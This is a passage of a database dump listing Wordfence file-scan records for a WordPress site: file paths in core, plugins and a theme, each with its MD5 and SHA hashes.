(0x8b7c426cf48a4948d2bcdd124f53c6b1, 'wp-includes/js/mediaelement/mediaelement-migrate.js', 1, 0x00000000000000000000000000000000, 0x3cb6030743925f687ad3043384ed3c37, 0x2c6223300ea02161ad4f56632cfa8fd8950353d48f4998d0bb25aedb702993fd, '', 0, '?'),
(0x8b8ccdd8a82647e9a6299a6b7bece8a8, 'wp-includes/sodium_compat/namespaced/Core/HChaCha20.php', 1, 0x00000000000000000000000000000000, 0xac071d8268e10c111efcfd50abd4ec14, 0x4be7d8ce13886418f9251db1192e52414ff446beded7e2e2e00fc1b76a6ff92d, '', 0, '?'),
(0x8b8ce995fff62dc20d7999f570d8468d, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/person-flag.svg', 0, 0x9e5b2a4c05bd5603fa4c2be33c673777, 0x9e5b2a4c05bd5603fa4c2be33c673777, 0x78f142746fe65d85b011adce8bdf9b21ff32be6e357851376b400cdab232c1a8, '', 0, '?'),
(0x8b8e4dafd3bcfff11e3754947eabd9cf, 'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php', 1, 0x00000000000000000000000000000000, 0x24e06b4117ce60c06c77dcceecb87984, 0x370d3409ecb6a510510a63edeafc3e630a063ed150660e38ed349006f8486ba4, '', 0, '?'),
(0x8b980b3cbd9fffe9933e24f406638ac2, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_speaker_phone_24px.svg', 0, 0x4663c6b9532e0abee5268e212fec49bf, 0x4663c6b9532e0abee5268e212fec49bf, 0x90d7c8c5d0879a1eede1977132263b5ec9c8d9e400d7786616ae7e9e3fb5dd7f, '', 0, '?'),
(0x8bba14b0c568142bb9ab42ccc6f21dd0, 'wp-includes/js/tw-sack.min.js', 1, 0x00000000000000000000000000000000, 0xa3b3fabcf845edad4a169343add9b94b, 0xf25e3e4d9974f7c8f9e622545b1569efdd36ff674f923e13e34e3a36fc0f47aa, '', 0, '?'),
(0x8bba46e822f7e87668e2a1244c628e8d, 'wp-includes/js/imgareaselect/border-anim-v.gif', 1, 0x00000000000000000000000000000000, 0x20c97a21993cf137ead9fdbecbc42aa8, 0x8be11f3efa15aac2f664e0953adbfdb98f146a31ed8d3cee2134db369367e6e4, '', 0, '?'),
(0x8bc047d93ef8791470a6712971c8eba3, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_offline_pin_24px.svg', 0, 0x84a1dbbb29bf18087923e2a7883c71ed, 0x84a1dbbb29bf18087923e2a7883c71ed, 0xae111220baf28e34a9f9841e507dc7032d9d4c87759121e771ef345b27ae78e4, '', 0, '?'),
(0x8bc9ba96652c5237ba2ab9accff7a4aa, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/creative-link.js', 0, 0x3740adc5f7dc9e94ba82a979225c4c2b, 0x3740adc5f7dc9e94ba82a979225c4c2b, 0x3f815b4703faeca594caa79718a09a8cf12c83da58c0b82054f9c8e53ce2d2b5, '', 0, '?'),
(0x8bd2cba936fd662fda36596a4900ee57, 'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php', 1, 0x00000000000000000000000000000000, 0x1b9e0358b055740bfa065cb8ce484484, 0x028197f1a2773ec8968718ef4055fd46b4ee67dd83147bca3d0ba82ddaaaeb35, '', 0, '?'),
(0x8be2b65620d161f7cd2bc295e8453070, 'wp-content/plugins/revslider/public/assets/assets/svg/navigation/ic_apps_24px.svg', 0, 0xcef37cff9d1d7b2d87943eaa392a9778, 0xcef37cff9d1d7b2d87943eaa392a9778, 0x0450df0148272120864e33a2caf3306bd52727905a3f1f87ea6b4f57b08447ee, '', 0, '?'),
(0x8bf04d4148f6ccf400ea9c5b645fd721, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php', 1, 0x00000000000000000000000000000000, 0x35e12c7d76c4a81633bcf547c0e229a9, 0x45bd72344000b8d4a124a6e27ae6fa33f0b8246cb2ea1ad06069e46578c36cca, '', 0, '?'),
(0x8bf37963e2304fb06729cf81ad4d66b8, 'wp-admin/network/site-settings.php', 1, 0x00000000000000000000000000000000, 0xdd1892afd7553ca9a66c83094bc5217a, 0xfce9bd54fd5977aa7654c339595092bbda16f1f0f017115c2411fac5426309c3, '', 0, '?'),
(0x8bf384559e5d52b29adb102959a5cb6d, 'wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff', 1, 0x00000000000000000000000000000000, 0x6efb6aaec0b9f430f6a3e21cfbe39b39, 0x15bc861af0d2a808320cc123b08516733ad5d0a00a0109097683f9c3982b6cb4, '', 0, '?'),
(0x8c0874c7b12510149812fba391b5da46, 'wp-content/plugins/wordfence/lib/wfNotification.php', 1, 0x00000000000000000000000000000000, 0x00c78d20560832e228c6c0fe64685644, 0x53d861d6e0598412edb50387fd676a2b7cadeb9120f290e14a1fb28c4d38b3aa, '', 0, '?'),
(0x8c0a891a600bc115dad0d1fb3b4f23c7, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/lightning.svg', 0, 0x48c8551c0dfb9b28c5ef92d23a0d4dad, 0x48c8551c0dfb9b28c5ef92d23a0d4dad, 0x0fe11641e9d0b9e7361a985dfa213a70d7e62e57f122fb611d1364dce6ebdc3e, '', 0, '?'),
(0x8c0ef2466a5d70db20d2eddc41630d70, 'wp-includes/Requests/Exception/HTTP/406.php', 1, 0x00000000000000000000000000000000, 0x4bc8cb6cef688c729edc3990220006ac, 0x2c6159d3e07d5052367f140b83eae360bd294b17edfc669e69736d20b8b903e8, '', 0, '?'),
(0x8c14611efcec0cb79eb5a152d8551089, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_gif_24px.svg', 0, 0x618c2d4490643f5c20fc5758b36ced57, 0x618c2d4490643f5c20fc5758b36ced57, 0xb93092d09646fb3dcda2f1dab7ec575d7ee9b49788f71af4fca26b3b707cdaa9, '', 0, '?');
INSERT INTO `zdenl_wffilemods` (`filenameMD5`, `filename`, `knownFile`, `oldMD5`, `newMD5`, `SHAC`, `stoppedOnSignature`, `stoppedOnPosition`, `isSafeFile`) VALUES
(0x8c31c1eacfa3d7e9199da0900b497fa4, 'wp-content/plugins/wordfence/lib/wfImportExportController.php', 1, 0x00000000000000000000000000000000, 0xe348d51313c016f94d9eb62ebf8a9edc, 0x05d2c68c01ac155a16e3bd3ef3c032a885c3ac8019dfd6c93c0d73fa4a32ab2a, '', 0, '?'),
(0x8c3c91e07c7e452ed1595ed421d65d04, 'wp-admin/js/widgets/media-audio-widget.min.js', 1, 0x00000000000000000000000000000000, 0xcf2e2e5b78863f6c5bd85bbf4594dbc2, 0xd1c768bbdce27e26e8f0d59901951ebc67115114f46d374824e1699c3f0cf430, '', 0, '?'),
(0x8c3f9a0a35fcb448e33fe2e0c1c0e0e8, 'wp-admin/css/customize-controls.css', 1, 0x00000000000000000000000000000000, 0x14f89cdca922d61b3ff683e5d627a025, 0x7ce91b9d1deed305b5761381ae0b4abf30def4b3500add8252c96da872e34380, '', 0, '?'),
(0x8c40f871faf5e21a9d553b58e6f75876, 'wp-content/plugins/revslider/admin/views/system/dialog-copy-move.php', 0, 0xd6e5885ed8d9778344c814bd0406dc6f, 0xd6e5885ed8d9778344c814bd0406dc6f, 0x8877dc52096490045c50988cc658a3cd79b65e7a9e652fd122101a24e1898aaa, '', 0, '?'),
(0x8c531696761afd390fa81b3a10c98a61, 'wp-content/maintenance/assets/images/facebook.svg', 0, 0xdc3714e15ee2485e02683e0bf0793907, 0xdc3714e15ee2485e02683e0bf0793907, 0xf32e45ba858918f5f3ac7bf07248fa13b1012d4e719eb383997fcdda0ae03337, '', 0, '?'),
(0x8c69700a9c9a876c31c0968582f857a4, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_Button.php', 0, 0xd78c1fd32c46f84b67608e93d8ce9f3d, 0xd78c1fd32c46f84b67608e93d8ce9f3d, 0x85231fdd36d8370f66f5d19caa75703a0e5f7899cc6fc20bd799628960584e21, '', 0, '?'),
(0x8c9dbdb4866a754743744fc6fed813e2, 'wp-admin/css/colors/coffee/colors-rtl.css', 1, 0x00000000000000000000000000000000, 0x7229d3fc179243a547504368f3516128, 0xf26bd67302461f3f21cb881ccaaadd01c95d4cd63dce372c79be6a762bf01767, '', 0, '?'),
(0x8ca8fea2d628cd01eb72a1b5407ffa01, 'wp-content/plugins/js_composer/include/autoload/vc-pages/page-custom-css.php', 0, 0x83277d78c4865be52d7dbd30f69bb7bc, 0x83277d78c4865be52d7dbd30f69bb7bc, 0x8790fe6ecf6d95f6bdb827d9c4de6d66ada20cab4ce0ba982958815f7d02ed61, '', 0, '?'),
(0x8cad6cab2e48077c538417b3d67bb086, 'wp-includes/js/jquery/ui/effect-transfer.min.js', 1, 0x00000000000000000000000000000000, 0x2d541c6d1e13a0f9bfbccdc6a68710af, 0xe345dabc9a504ab2f674c771c2061d72e263f749612c2e11e0aa316e56fa48fb, '', 0, '?'),
(0x8cb0b88774fb886ec0ca6143b3f17041, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-posts-slider.svg', 0, 0xa2179b4a2c5c23ca9a3c3713a60ea7bc, 0xa2179b4a2c5c23ca9a3c3713a60ea7bc, 0xea89f7df1a82cb065791b149b7050acdc524cb598751301040a7efb24a13799b, '', 0, '?'),
(0x8cb8a6495355607580b4fa54f2c0ca46, 'wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php', 1, 0x00000000000000000000000000000000, 0xe96c887bc3624f73e9935f61ba14de3e, 0x6df56e35f1cbdf90d69eceb267014ad9fc5cb5fd0217abbeda3386f2e312f5c8, '', 0, '?'),
(0x8cbc430a30a975592af45843eaa2bd61, 'wp-content/plugins/js_composer/assets/js/editors/templates-preview.js', 0, 0x4fc8dc88c1f605a936b19828f0a7d24e, 0x4fc8dc88c1f605a936b19828f0a7d24e, 0xde9c993c0fa1dcae12becc5a2e024fb72a28f70dddcb552084b4e8e36defc2cc, '', 0, '?'),
(0x8cca9abc7b068028fa8bd05c699f372e, 'wp-includes/Requests/Exception/HTTP/431.php', 1, 0x00000000000000000000000000000000, 0xe0e3737c622417ca08d5d1933c1489d9, 0xebea85b18dac2f1459365fa0eca0d177ca1d04706bb277f6c10fb430ffff18a7, '', 0, '?'),
(0x8cdf7da55e3732c2080712828488b7ae, 'wp-includes/Requests/Exception/HTTP/415.php', 1, 0x00000000000000000000000000000000, 0x0258cc0fb05462ea8f11ccaea34a55c3, 0x762514ca5fc400d062246d912660ebf396c528fb3d996d063cd006621a6f3070, '', 0, '?'),
(0x8ce31443939676f75b80ee6696677e94, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_content_box.php', 0, 0x5d8e9b96f3fa304524dfdc256422eccd, 0x5d8e9b96f3fa304524dfdc256422eccd, 0xab993ead4d7329eaaebcab8145286624d0b8a771d68bb9f19c0b6fef44919437, '', 0, '?'),
(0x8cede406892a676516b78b980bc618f4, 'wp-content/plugins/js_composer/include/templates/shortcodes/rev_slider_vc.php', 0, 0xb693eb01e4b1bf61bf1d28e1280aac29, 0xb693eb01e4b1bf61bf1d28e1280aac29, 0xb6fcade1d6acc7381b4abd649ca03452bbceee43b379248fc20548e887cc3d51, '', 0, '?'),
(0x8d0ff9336d04a9c5b3f5998959a09f49, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/wrench.svg', 0, 0x0f687334ebd33eab3e9fa40f63a1783b, 0x0f687334ebd33eab3e9fa40f63a1783b, 0xa451bfa388b56f6f9f997b749f625aa31f8008a86b87f0c404bda7e517912b00, '', 0, '?'),
(0x8d103e9a25c0d9b59804116198c2fce9, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_photo_size_select_small_24px.svg', 0, 0xc0daa0c622a45f01bcfa4a3a750ddfa4, 0xc0daa0c622a45f01bcfa4a3a750ddfa4, 0xfb76415fa31e52eadbe1110027ae7d9b4b63f56d76c6262e16efccf38c24bd9c, '', 0, '?'),
(0x8d1095d2616e9db5f6563d54792058e4, 'wp-includes/SimplePie/Copyright.php', 1, 0x00000000000000000000000000000000, 0xbd7fbf68b954a9d50955cc808db7cb6a, 0xc11deb10625f2434855fc36d32b4f0c24212b2e54aa25cd335e6df8f2225094e, '', 0, '?'),
(0x8d16ba1534f3c5f531ba598c2ebfc5e4, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/jquery-classygradient-min.js', 0, 0xa62aa6bae4cf80a464cd91ce8d97423d, 0xa62aa6bae4cf80a464cd91ce8d97423d, 0xbf474196390256f1c0bdb62ff94f53e0d44edabd627d8febddc77160e2bc29b9, '', 0, '?'),
(0x8d1dc27acc0c13e72d3b6e12fd65bedb, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/like.svg', 0, 0x6ba9366135068e5453cf7c9ed5c3360c, 0x6ba9366135068e5453cf7c9ed5c3360c, 0xcdf26d372559ac56e0d71098c293581215583124da7bd07c0984fc4200681410, '', 0, '?'),
(0x8d2f465069a623f5b52d7da287db8512, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_icon_manager.php', 0, 0x3c40953dee992f2fb13976ae6590d7db, 0x3c40953dee992f2fb13976ae6590d7db, 0xab4e9290c3573d14458a05d7562de25c682cd4106c47127b5d141cc4f8553e7a, '', 0, '?'),
(0x8d38df5b4d92e318c36ef9042d1e9c6d, 'wp-content/plugins/js_composer/include/classes/vendors/plugins/acf/grid-item-shortcodes.php', 0, 0x3060ec276f64532ca500026157c41250, 0x3060ec276f64532ca500026157c41250, 0x8bdb3f66b5e9e4cbb474df496f2bea76b52e851b92d180e923f4bf65770c16ee, '', 0, '?'),
(0x8d3e92025ee63ee51dc801a228bc16d9, 'wp-content/plugins/js_composer/include/classes/editors/navbar/class-vc-navbar.php', 0, 0xdfc716f5131f00a1af2fd8cb1a662112, 0xdfc716f5131f00a1af2fd8cb1a662112, 0xea589da29df21bf10be5e2068f1d1776cbc5d646723bf4e475957979605e46ad, '', 0, '?'),
(0x8d43493799ac0012390a51345723ed33, 'wp-content/themes/Impreza/framework/templates/index.php', 0, 0xafcf305229cfb81d93a667a070a16d51, 0xafcf305229cfb81d93a667a070a16d51, 0x8ad32314731842d56edb052659220fe868dc8ca4d430e916c4349732db5d9acd, '', 0, '?'),
(0x8d5c849202d189753c8f221759da9cc6, 'wp-content/plugins/js_composer/config/content/shortcode-vc-separator.php', 0, 0xa79c8f6ca54a4d76c8fcec7c77159cc3, 0xa79c8f6ca54a4d76c8fcec7c77159cc3, 0xce27033d2c6506c3d968cdcf743461ec00f8aa1cf477a4ab1118af7ff0c2dda1, '', 0, '?'),
(0x8d65f07d13516d4abc545dadc118bed6, 'wp-content/plugins/js_composer/include/templates/editors/popups/vc_ui-panel-post-settings.tpl.php', 0, 0x5cc26e1b97686ae642e407d1c01d7178, 0x5cc26e1b97686ae642e407d1c01d7178, 0xac7fd2601bff6a7f245e643842289392d25d6fbf33ddbddede1f6f89a4f09951, '', 0, '?'),
(0x8d7d208d79541e8eec5add488463444a, 'wp-admin/js/custom-background.min.js', 1, 0x00000000000000000000000000000000, 0x5442cfbbb1ab1df7b84357bed44a6d10, 0x59d84d100804c2b1e54d49c4afbd34ec90e538263f2dc8e30e733149fbec6f93, '', 0, '?'),
(0x8d972dd013dc0b44114e970bb24537af, 'wp-content/plugins/revslider/admin/assets/imports/fashion/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x8dac7bdf306c28c6b275392c7753d875, 'wp-includes/js/media-audiovideo.js', 1, 0x00000000000000000000000000000000, 0x54d8075995b61d4ddae11c67e8ff0667, 0x6ecb468fcb9a4020c244605997cc3c8519506b17440072635d963e8e8ebdf974, '', 0, '?'),
(0x8db2b5028dff4a9a3bde1f85ef390ed4, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_markunread_mailbox_24px.svg', 0, 0xea2f989654896a1360bc1538a368a316, 0xea2f989654896a1360bc1538a368a316, 0x43e2a279810bd7d4d617f05c503b2881be02ead8357350666c74ca692bf9398e, '', 0, '?'),
(0x8de429211b29c336910ce53e7dc93734, 'wp-includes/css/dist/block-library/style-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x49ce7010cf79420acb259b206601a1c1, 0x339574d33983828b6df0439c1bb0f2ec8b318b8ddfa3ad66251810f77ad42ed9, '', 0, '?'),
(0x8de5d81cdf7b342e287585cc3037c6b5, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg', 0, 0xa18eaaf5363f01d06502511591b17fc7, 0xa18eaaf5363f01d06502511591b17fc7, 0x13aa8a20b8bfe63204a8930f908c9fa1e41d060f1929aabc4b53c66f3d6eb614, '', 0, '?'),
(0x8dfd15a94c85f2560f13ff5992e0ff2a, 'wp-includes/js/plupload/moxie.min.js', 1, 0x00000000000000000000000000000000, 0x5b6e97b8f1fc2f1cef763570a8b578da, 0x8f9be1cd302ce75dd0d0fe992c1ad1c9db1d1b5aa637e901077e33ad40cefdfa, '', 0, '?'),
(0x8dfd1cb4e689bdcc76c0c8f83b127443, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_format_align_right_24px.svg', 0, 0x719602829a3b2eee79dd7d72d6143e0b, 0x719602829a3b2eee79dd7d72d6143e0b, 0x339ed426980d2eef8a997f824ca346fcf68d487522cc9a9795ed2abc613970cb, '', 0, '?'),
(0x8e20e94124dba46643814ef699330737, 'wp-includes/query.php', 1, 0x00000000000000000000000000000000, 0x13b871cae9505951a1f90021512bfaba, 0x8b2080c69e23968b4f20dfe8d754d7a27380eb70f405c44cb71933727e85ca45, '', 0, '?'),
(0x8e28a2fb8fd794ef1d57e5681c403d61, 'wp-includes/images/smilies/icon_mad.gif', 1, 0x00000000000000000000000000000000, 0x561e9e210ecb0c400ffd63fb30e253b8, 0x129deec0b1bd8a83a7c664165b4f013ac787f3089ef3b5cb03b36a6c7df271da, '', 0, '?'),
(0x8e37ff30a5ecc105c12c9a09094d1c0f, 'wp-includes/sodium_compat/namespaced/Core/Poly1305.php', 1, 0x00000000000000000000000000000000, 0x5179be84a33fbf1e3be9389e560a06f8, 0x00c72dd8de5d14ebaeb3870e95584574299860c9c531d81f43fd7d4d7232dd2f, '', 0, '?'),
(0x8e4b47b24efe65c2804d9abd2a72b157, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_stop_screen_share_24px.svg', 0, 0x7f2410e3dc3c7455f01c02e7df3c88e1, 0x7f2410e3dc3c7455f01c02e7df3c88e1, 0x4b09c3638777116290d7db58457ec56fe320ad6ca2a44d961e37a7ed662698f8, '', 0, '?'),
(0x8e4ef2e4df87ebed2611c3753b4115c6, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_face_24px.svg', 0, 0x5cf8d2305e1c1d05633221db9a250e07, 0x5cf8d2305e1c1d05633221db9a250e07, 0xfc61964e9348d578f86a62b295c8450c8fd96705c86c29f60d2ec3727c360491, '', 0, '?'),
(0x8e50fa2439f465607ab6ae40bafc333e, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_settings.tpl.php', 0, 0x6bf11fe113c6d8bc6ff66be4ecec4023, 0x6bf11fe113c6d8bc6ff66be4ecec4023, 0x9744649a80a748eff56678f58d0eac521d6acbd244d56d86d6038129a58085e2, '', 0, '?'),
(0x8e67171abb14bb5cdb0d9e603d836dad, 'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php', 1, 0x00000000000000000000000000000000, 0x17500db64c1308f7c3c1fbc77bc780f5, 0xfc8de311f49d565a2b8de226830d16c9d0a9d10b553bff4c290c52c821d3b5ce, '', 0, '?'),
(0x8e698a05a9b542c8166adfdef6d6ef5d, 'wp-includes/sodium_compat/namespaced/Crypto.php', 1, 0x00000000000000000000000000000000, 0x08974738a94a2b9c1cf4b38b09bea07a, 0x053e389ca9b82758eb69d45562fd47d0bdd82c3c5460361117e4b9c834d08df0, '', 0, '?'),
(0x8e6e22e709e5f6a7cb1105f20269ccd7, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_save_24px.svg', 0, 0x19b13d0b6b8774b448c6ebe7d5180653, 0x19b13d0b6b8774b448c6ebe7d5180653, 0x2c4314b81fd24cd5c94a6bfbf08c9470a88919832262287919406339358536ed, '', 0, '?'),
(0x8e8483f976fcb48a08cf8ce98c5939d3, 'wp-includes/ID3/getid3.lib.php', 1, 0x00000000000000000000000000000000, 0xe22ed281f7be302892f6b97e48bc36e4, 0xe223f8e142c597022ca26e21a89136b1b512a83b0abc98b1587ef5e21a4f30ac, '', 0, '?'),
(0x8e98f265d4d4dc54b3ca03415fb33a41, 'wp-content/plugins/Ultimate_VC_Addons/admin/bsf-core/BSF_License_Manager.php', 0, 0x7e8e2778a91bba4750ab07ebd57d9a0a, 0x7e8e2778a91bba4750ab07ebd57d9a0a, 0x1890a8048fbd49b92c7f34eae94e3b8aea9dee15252cf3fe86752b38820a7c24, '', 0, '?'),
(0x8e9f1885589282988148f66f9d76cb0e, 'wp-admin/css/common-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xde8f811db5ab98f7759282ebc81b4dcb, 0x7b826ddf760069a81cfe0424c458362b51052b0735b11359c144a5b8ea1d1a24, '', 0, '?'),
(0x8ea2e958701fa4dc10d3e78a7e304418, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php', 1, 0x00000000000000000000000000000000, 0x1ed057af6f65b17eb0906f42329e5f3b, 0x359f71f5aa53724cdf5d8d4f58bda5981e8b737188cdecf02b0b6c3c91c8c992, '', 0, '?'),
(0x8ea3939feb3a614d7edf23ff0e345200, 'wp-content/themes/Impreza/framework/config/social_links.php', 0, 0x0611470e89c8b6ff509ff27ff51da213, 0x0611470e89c8b6ff509ff27ff51da213, 0xfdbdc5c97f347728c02067db8918a0ab42d8b1c6d954198c59112c17c6b06652, '', 0, '?'),
(0x8eb0d6975d4e528dbcef537b71763f85, 'wp-admin/css/wp-admin-rtl.css', 1, 0x00000000000000000000000000000000, 0x4a89411639f686bd178d00573aa9dec1, 0xd9b2e72bd3cb7f3b48876fde74d4f4af7fb24e982dc5ed67131cb46515defca0, '', 0, '?'),
(0x8ec11a2c1f7af3d511a713d290945592, 'wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php', 1, 0x00000000000000000000000000000000, 0x799d65ff26b9e5d75251d4754bb5cdd0, 0x7eb4c11949ccd19d7f871a68d18c6c15d3f587f06cff350451cdfcec76fd5906, '', 0, '?'),
(0x8ec6430f5c5813aa9eb7a7923fb3eeaa, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg', 0, 0xcd2f9b3392021b5c2db2fe25c615a743, 0xcd2f9b3392021b5c2db2fe25c615a743, 0xc988e63e357e442e3531c58defefddbfa240ac38c04bb6e4695272b119d84b27, '', 0, '?'),
(0x8eee1b4fdc8e2438aa874a1ca665bb82, 'wp-content/plugins/wordfence/models/scanner/wfScanner.php', 1, 0x00000000000000000000000000000000, 0x08820f2578d6263675e1acb8fb8faab4, 0xd899336a70bc06d18500964cd0463fe27c73b11d621805f0f32adf0360187d40, '', 0, '?'),
(0x8f061d93ffcb5ed7292efbb6b4bb5524, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_payment_24px.svg', 0, 0x7a95477d03857d2c2d331b1b1514e558, 0x7a95477d03857d2c2d331b1b1514e558, 0xfa5d7c9dbb1fa1b363c6880a5c1bae07de8770d3a7b99521cebe9d07800bc01a, '', 0, '?'),
(0x8f0856f1dc82300055ff60b71e35433e, 'wp-includes/css/dist/components/style-rtl.min.css', 1, 0x00000000000000000000000000000000, 0x58a83301414521c957ebbd1e1962431d, 0x179b9af39e1579dedb2f50992032d5e1af4f8f19efb911a2ef5ff5dad71ca0d4, '', 0, '?'),
(0x8f1a9f200cdc528fb3f7b95bd627dd3e, 'wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png', 1, 0x00000000000000000000000000000000, 0xeb4a975c630f379279fe78c604d0b36c, 0xb37ec0cd71569ac203afbe2a27c5103194a5a49a9d175d33905e91f69ecdc96d, '', 0, '?'),
(0x8f203349cf4184438770a6027e09a9ba, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-separator.php', 0, 0x139dad8c1604e7a1cb92edb094ca5867, 0x139dad8c1604e7a1cb92edb094ca5867, 0x2301a77fb144ffdf19d0641d42752a86c65a5f05f2640b3c91e703aff0f923c1, '', 0, '?'),
(0x8f249d811bbbc0aa6ab6589e5d29443a, 'wp-load.php', 1, 0x00000000000000000000000000000000, 0x75a34c0dcc2bcdb7b39425003964b054, 0xa9bcb9b5540001bff4453ee7b6a3366d1cc2472418f6ac94cbc5d6755ea86260, '', 0, '?'),
(0x8f32df5ce9317f37d580d47769847b1b, 'wp-includes/js/dist/vendor/wp-polyfill.min.js', 1, 0x00000000000000000000000000000000, 0x7d2ef4bb244bac8a81d13ef4382d168e, 0x2ea1d3da0fdf43e5ca5cda0de4c785230e674cd64bf9e4f6023087a9df14c4b2, '', 0, '?'),
(0x8f4252ef3f0d7e7510ffae4dbe6725d3, 'wp-content/plugins/js_composer/assets/js/dist/frontend-editor.min.js', 0, 0x894283ae5a92a423e1d0bd80abb9c3bb, 0x894283ae5a92a423e1d0bd80abb9c3bb, 0xdc4bc5c9c7839579575946e17ebe1a6aff0307404567286b3b5c35bc75e2a156, '', 0, '?'),
(0x8f441880dda3db3c2d0992c307dd3d18, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_colorize_24px.svg', 0, 0x9e20ffcb4aeb50c4dc70d33b2d388c21, 0x9e20ffcb4aeb50c4dc70d33b2d388c21, 0x3f36190249674560b9d0a5c2e42e8e5cb27d4fbdcb7243a05b48a8d90b16a600, '', 0, '?'),
(0x8f48be2999eb118692d7c76a48d16a0b, 'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php', 1, 0x00000000000000000000000000000000, 0x56ed2742c76ccb4966e3f39ed6226319, 0xb3b94f2488d3553f81d10a52ac94799691ec5615e0b30f3d8754f51dad0cf95a, '', 0, '?'),
(0x8f4b9c60f92b481234a6c9c837f6cccf, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_16_9_24px.svg', 0, 0x4c25b7b1a4cef43d0534a52be552849c, 0x4c25b7b1a4cef43d0534a52be552849c, 0x5247346444069dff493728adc54d4f11867235373ed309be4c86a1cc583ffe53, '', 0, '?'),
(0x8f6758d00fa5580e519e28a9a721f18a, 'wp-content/plugins/wordfence/css/jquery-ui.min.1579191227.css', 1, 0x00000000000000000000000000000000, 0xc07d4ff1935ed73074474716e4cc5113, 0xb3d98d240c72623d70cf680eb978cb4ba3f9355d38c751fea7985289af6a6e34, '', 0, '?'),
(0x8f6a254dbbc98df2d17017295a89c40b, 'wp-admin/images/generic.png', 1, 0x00000000000000000000000000000000, 0xf88e1b95ff278a5b231f39380b211ed0, 0xa77b75eba3e5d54b5b67cd86054578dc7ba53adfbc82fa6ccda847c411181fab, '', 0, '?'),
(0x8f8fb6e51d974c4e980bc653279386f4, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_settings_input_antenna_24px.svg', 0, 0x2aaea4122cd4865d7b48e3d6e2b41896, 0x2aaea4122cd4865d7b48e3d6e2b41896, 0x24c4f44ecb671bff0a0edf53bafc081f00d5895c3a83dcac39d45b53e90ca553, '', 0, '?'),
(0x8f961709124e68d8245a1d8d95f290bf, 'wp-content/themes/Impreza/framework/vendor/usof/js/ace/theme-usof.js', 0, 0x0e0ca67b37e5acb1e2a90bbc3130e32c, 0x0e0ca67b37e5acb1e2a90bbc3130e32c, 0x181564266476214adf641d9d4abf8fb8686b06840ae33ef6598a87b8dfa0e55e, '', 0, '?'),
(0x8f9ce5617a3c8f0b167175be5afce914, 'wp-content/plugins/Ultimate_VC_Addons/assets/min-js/easy-ticker.min.js', 0, 0x3d445856508a729140d9cd21d6489196, 0x3d445856508a729140d9cd21d6489196, 0x9404783bab5b5c97731bc004f97fd9ce74f8563086f2f81a948ed1d6f5051f2e, '', 0, '?'),
(0x8fbf524b51eb35769d1c2dbcfc09b9f2, 'wp-includes/css/dist/edit-post/style.css', 1, 0x00000000000000000000000000000000, 0xfbf2f30961ba450c95233ebd563c64f5, 0xad4a3c2c2eddac7d499867dda7666148c60c0768e773969208aac683df19c96b, '', 0, '?'),
(0x8fdc3b28587060d299d6ec9170ddb708, 'wp-includes/js/plupload/handlers.min.js', 1, 0x00000000000000000000000000000000, 0x0af080d323b400286d6b6c1ce141abfc, 0x72e6a04983b4ffc8f1cf0a069969cb3607060677b71a3dd765b5af024d28deef, '', 0, '?'),
(0x8fe9b41db19ada74eecaf9569a46ad2f, 'wp-content/plugins/revslider/admin/assets/js/context_menu.js', 0, 0xe33d3407ed6f6f6124c363dc2a3e8eef, 0xe33d3407ed6f6f6124c363dc2a3e8eef, 0x2d929b64665d18e8f921971510c48b780150e48cada0d1a075613172d83d0dc6, '', 0, '?'),
(0x8ffb7418f730c367f1bb61862fc5fd9e, 'wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff', 1, 0x00000000000000000000000000000000, 0x7e0c88f02dcaf2f78c90b4dc7827b709, 0x8a997bda8bfec24eec6fdcd7235814c12b586527a2a38c86cf5f85dee5c73e1a, '', 0, '?'),
(0x9001060a99716fe3715a5679589cbf39, 'wp-admin/includes/menu.php', 1, 0x00000000000000000000000000000000, 0xf1fe23e2e2bd1579389554e903c5748a, 0x58b0c66ac692a0eccdd855bbfd6e5cf6813d86d03a824c1b3beafa95404f887b, '', 0, '?'),
